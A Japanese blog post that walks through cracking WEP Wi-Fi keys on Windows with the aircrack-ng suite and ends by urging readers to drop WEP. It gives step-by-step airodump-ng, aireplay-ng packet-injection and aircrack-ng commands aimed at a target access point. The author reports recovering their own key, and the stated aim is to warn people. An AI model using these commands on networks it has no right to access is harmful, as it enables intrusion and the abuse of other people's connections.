[PR]上記の広告は3ヶ月以上新規記事投稿のないブログに表示されています。新しい記事を書く事で広告が消えます。
■Windows上で動かす目的
もちろんLinux上で動かすのが一番良いし、安定している。
だけど普段使うのはWindows。Linuxもちょっとかじったけどイマイチ常用には…。
だったらWindowsで動かせれば一番いい。ってことでトライ。
現状の環境を維持したままで行える。
Windows Tutorial
http://www.aircrack-ng.org/doku.php?id=windows-tutorial&rev=1186070726
ここを参照して、やってみた。
■必要なもの
■大体の手順
1.CommView for Wifi のドライバで無線Lanカードをインストール。(net5211.inf)
2.airserv-ng で 各種ツールをWindows上で利用できる状態にする。
airserv-ng [opts]
ex) airserv-ng -d commview.dll -p [port] -c [channel]
[port]、[channel]は任意。
3.NetStumbler でMACやESSIDやらCHを確認する。
4.airodump-ng で IV のキャプチャ開始。
airodump-ng [options] [interface]
ex) airodump-ng 127.0.0.1:[port] -a --bssid [enemymac] -c [ch] -w output
5.aireplay-ng でパケットインジェクション。
associatedされた状態にする。
ex) aireplay-ng.exe 127.0.0.1:[port] -1 60 -q 10 -a [enemymac] -h [yourmac] -e [ESSID]
パケットを送りつける。
ex) aireplay-ng.exe 127.0.0.1:[port] --arpreplay -b [enemymac] -h [yourmac] -e [ESSID]
6.aircrack-ng でIVを解析。DATA を 200,000以上は集める必要があると記述されている。
airodump と aircrack を同時に動作させ、キャプチャしながら解析もできる。
aircrack-ng [options]
ex) aircrack-ng *.cap
7.しばらく待っていると… (゚Д゚)ウマー
ex) は自分用。
http://www.aircrack-ng.org/doku.php#documentation
を参照して自分なりに書き換えるとなお良い。
とはいったものの自分でも良くわかっていないが…。
自分のWEPのキー復元はできた。なんと簡単。5文字だったからすぐだった。
以前WPAに変えたときは接続が不安定になったので結局危険を顧みず
WEPで現状維持。うーん、へんなことされなきゃいいけど。
WPAとかにするとか、とにかくWEP以外のセキュリティを使ったほうが無難かも。
それでもクラックされないという保障は無いけど。
とにかくWEPは以外に簡単にクラックできちゃうってこと。
クラックされると誰かが自分のアクセスポイントを利用して、踏み台にされるかもってこと。
そうすると、たとえばあなたの家から大量のスパムメールが送られたり、不正な接続の中継、はたまた、詐欺行為の隠れ蓑にされかねないわけだ。
なのに、パスワードの設定すらしていない野良APは結構あったりする。
せめて暗号化だけはしておいたほうがいいと思いますよ。
注意喚起的な意味でちょっとだけ書いておくことにする。